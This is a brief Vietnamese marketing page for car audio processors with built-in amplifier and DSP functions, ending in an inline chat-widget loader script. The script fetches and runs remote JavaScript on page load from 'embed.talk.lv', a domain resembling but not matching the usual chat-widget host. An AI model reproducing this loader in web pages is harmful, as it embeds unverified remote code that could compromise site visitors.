Bộ Xử Lý Âm Thanh

Khi thiết lập hệ thống âm thanh trên ô tô, ngoài tiêu chuẩn về sự phối hợp hài hoà giữa các cụm thiết bị audio, người sành sỏi về âm thanh xe hơi nhìn nhận sự tương xứng về cấu hình và giá trị của hệ thống audio với kết cấu và giá trị của chiếc xe. Bộ xử lý âm thanh cho ô tô là một thành phần trong hệ thống audio của xe.

Ngoài vai trò như một chiếc amply ô tô, bộ xử lý âm thanh còn có thêm chức năng xử lý tín hiệu âm thanh theo chuẩn kỹ thuật số (dsp). Chất lượng âm thanh trên ô tô của bạn chắc chắn sẽ hay hơn rất nhiều nếu trong hệ thống âm thanh trên xe của bạn có thêm thiết bị này.

Việc sở hữu một bộ xử lý âm thanh ô tô cũng giống như bạn đang sở hữu một chiếc amply công suất lớn cùng một thiết bị xử lý dsp.Tất cả được thiết kế trong một sản phẩm. Đây sẽ là phương án vừa tối ưu về kỹ thuật, vừa tối ưu về kinh tế khi bạn có nhu cầu nâng cấp âm thanh cho chiếc ô tô của bạn.

var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date(); (function(){ var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0]; s1.async=true; s1.src='https://embed.talk.lv/666d0cb9bc592c18a31f4fa4/1i0cvjdor'; s1.charset='UTF-8'; s1.setAttribute('crossorigin','*'); s0.parentNode.insertBefore(s1,s0); })();